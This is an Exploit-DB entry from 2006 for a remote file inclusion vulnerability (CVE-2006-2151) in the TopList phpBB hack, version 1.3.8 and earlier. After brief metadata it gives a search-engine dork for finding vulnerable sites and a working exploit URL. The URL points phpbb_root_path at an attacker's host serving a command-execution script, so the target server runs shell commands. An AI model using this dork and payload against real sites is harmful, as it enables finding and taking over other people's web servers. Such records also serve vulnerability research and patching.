TopList <= 1.3.8 phpBB Hack Remote File Inclusion Vulnerability

2006-04-27T00:00:00
ID EDB-ID:1722
Type exploitdb
Reporter [Oo]
Modified 2006-04-27T00:00:00

Description

TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion Vulnerability. CVE-2006-2151. Webapps exploit for php platform

                                        
                                            Title: TopList Hack for PHPBB &lt;= 1.3.8 Remote File Inclusion
URL: http://www.phpbb2hacks.de/toplist-df148.html
Dork: inurl:"toplist.php" "powered by phpbb"
Credits: [Oo]

Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-27]